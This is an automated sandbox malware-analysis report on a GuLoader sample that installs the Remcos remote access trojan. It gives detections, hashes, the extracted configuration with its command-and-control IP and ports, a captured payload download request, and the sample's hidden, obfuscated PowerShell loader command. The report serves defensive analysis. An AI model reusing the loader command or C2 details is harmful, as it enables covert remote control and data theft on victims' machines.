Windows Analysis Report
Q20240425 MAX5073626.com.exe

Overview

General Information

Sample name: Q20240425 MAX5073626.com.exe
Analysis ID: 1431846
MD5: 1c089552c29f12843d8cd8e2bbf5cf5b
SHA1: 6f3e611fc7d7d5938b99575bcd96366d6e213eab
SHA256: 76dbfa281b158a18c83d08a907f087b7330da28bdd2298eb9ee2f23c1df40491
Tags: exe
Infos:

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Powershell drops PE file
Suspicious powershell command line found
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
 https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Found malware configuration
Source: 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "193.239.86.203:3702:1193.239.86.203:4089:1193.239.86.203:4093:1193.239.86.203:2700:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UI3GST", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exe ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exe Virustotal: Detection: 20% Perma Link
Multi AV Scanner detection for submitted file
Source: Q20240425 MAX5073626.com.exe ReversingLabs: Detection: 13%
Source: Q20240425 MAX5073626.com.exe Virustotal: Detection: 21% Perma Link
Yara detected Remcos RAT
Source: Yara match File source: 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 3844, type: MEMORYSTR
Uses 32bit PE files
Source: Q20240425 MAX5073626.com.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Q20240425 MAX5073626.com.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2191279426.0000000007152000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbMn source: powershell.exe, 00000001.00000002.2195123404.00000000083B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5O source: powershell.exe, 00000001.00000002.2185997052.0000000002CB1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lambda_methodCore.pdbt/ source: powershell.exe, 00000001.00000002.2195123404.00000000083B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2191279426.0000000007152000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_00402B75 FindFirstFileW, 0_2_00402B75
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_0040673F GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_0040673F
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_004065F5 FindFirstFileW,FindClose, 0_2_004065F5
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 193.239.86.203
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 193.239.86.203 ports 4089,4093,0,2700,8,80,3702
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49738 -> 193.239.86.203:4089
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: MERITAPL MERITAPL
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /XWJPh99.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 193.239.86.203Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: global traffic HTTP traffic detected: GET /XWJPh99.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 193.239.86.203Cache-Control: no-cache
Source: wab.exe, 00000007.00000002.2923725946.0000000006D88000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2924069038.0000000007000000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://193.239.86.203/XWJPh99.bin
Source: wab.exe, 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.239.86.203/XWJPh99.binW
Source: Q20240425 MAX5073626.com.exe, Q20240425 MAX5073626.com.exe.1.dr String found in binary or memory: http://nsis.sf.net/NSIS_Error...
Source: powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2186655798.0000000004C26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2186655798.0000000004AD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2186655798.0000000004C26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2186655798.0000000004AD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.2186655798.0000000004C26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_00404B65 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00404B65

E-Banking Fraud
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 3844, type: MEMORYSTR

System Summary
barindex
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exe Jump to dropped file
Contains functionality to call native functions
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_0583D53D Sleep,NtProtectVirtualMemory, 7_2_0583D53D
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx, 0_2_004036D7
Creates files inside the system directory
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File created: C:\Windows\resources\0809 Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_00407146 0_2_00407146
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_00404453 0_2_00404453
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0462F000 1_2_0462F000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0462F8D0 1_2_0462F8D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0462ECB8 1_2_0462ECB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_074EBB58 1_2_074EBB58
PE file contains executable resources (Code or Archives)
Source: Q20240425 MAX5073626.com.exe Static PE information: Resource name: RT_VERSION type: 0420 Alliant virtual executable common library not stripped
Source: Q20240425 MAX5073626.com.exe.1.dr Static PE information: Resource name: RT_VERSION type: 0420 Alliant virtual executable common library not stripped
Uses 32bit PE files
Source: Q20240425 MAX5073626.com.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.evad.winEXE@8/11@0/1
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx, 0_2_004036D7
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_004040BA GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,EnableWindow, 0_2_004040BA
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_0040234F CoCreateInstance, 0_2_0040234F
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File created: C:\Users\user\AppData\Local\Radioactinium Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_03
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-UI3GST
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File created: C:\Users\user\AppData\Local\Temp\nstD63D.tmp Jump to behavior
Source: Q20240425 MAX5073626.com.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Q20240425 MAX5073626.com.exe ReversingLabs: Detection: 13%
Source: Q20240425 MAX5073626.com.exe Virustotal: Detection: 21%
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File read: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe "C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe"
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
